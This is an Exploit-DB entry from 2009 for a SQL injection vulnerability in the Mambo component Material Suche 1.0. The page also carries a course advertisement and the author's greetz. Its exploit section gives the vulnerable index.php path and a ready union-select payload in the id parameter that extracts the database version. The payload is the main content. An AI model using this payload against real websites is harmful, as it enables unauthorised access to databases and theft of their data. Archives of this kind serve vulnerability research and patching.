Mambo Component Material Suche 1.0 - SQL Injection

EDB-ID:

10750

CVE:

N/A


Author:

Gamoscu

Type:

webapps


Platform:

PHP

Date:

2009-12-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#############################################################
# Mambo Component Material Suche 1.0 SQL injection Vulnerability

# Author: Gamoscu

# Site: www.1923turk.biz

# Site: http://gamoscu.wordpress.com/

# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
  
##############################################################

# Exploit:

   index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]


  -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
     
##############################################################

Vatan Lafla De�il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin